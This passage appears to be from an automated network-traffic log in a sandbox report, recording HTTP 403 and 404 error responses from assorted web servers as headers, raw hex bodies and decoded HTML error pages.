4f 52 54 59 50 45 3e 0a 3c 2f 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Mon, 01 Nov 2021 09:09:10 GMTContent-Length: 13724Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:11 GMTServer: ApacheLast-Modified: Wed, 02 Aug 2017 08:47:14 GMTAccept-Ranges: bytesContent-Length: 1242Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Mon, 01 Nov 2021 09:09:12 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Mon, 01 Nov 2021 09:09:12 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: Mini web server 1.0 ZTE corp 2005.Content-Type: text/html; charset=iso-8859-1Accept-Ranges: bytesConnection: closeX-Frame-Options: SAMEORIGINCache-Control: no-cache,no-storeData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 54 4d 4c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 32 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <HTML> <HEAD><TITLE>404 Not Found</TITLE></HEAD> <BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"> <H2>404 Not Found</H2>The requested URL was not found on this server.</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:16 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 01 Nov 2021 09:04:04 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbidden
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: mini_httpd/1.19 19dec2003Date: Mon, 01 Nov 2021 17:09:18 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sConnection: closeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 6e 69 5f 68 74 74 70 64 2f 22 3e 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 31 39 20 31 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/mini_httpd/">mini_httpd/1.19 19dec2003</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 01 Nov 2021 17:09:17 GMTContent-Type: text/htmlContent-Length: 566Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Mon, 01 Nov 2021 09:09:16 GMTContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f 68 31 3e 3c 2f 64
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:20 GMTServer: ApacheStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 35 37 31 0d 0a 28 6e 6f 6e 65 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 38 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 36 37 45 38 45 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 62 61 73 65 2d 63 6f 6c 6f 72 3a 20 23 30 30 35 42 37 30 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 61 72 72 6f 77 2d 63 6f 6c 6f 72 3a 20 23 46 33 39 36 30 42 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 44 61 72 6b 53 68 61 64 6f 77 2d 43 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 20 7b 20 63 6f 6c 6f 72 3a 23 30 32 31 66 32 35 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 42 39 38 30 32 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 73 79 73 5f 63 70 61 6e 65 6c 2f 69 6d 61 67 65 73 2f 62 6f 74 74 6f 6d 62 6f 64 79 2e 6a 70 67 29 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 72 65 70 65 61 74 2d 78 3b 0a 20 20 20 20
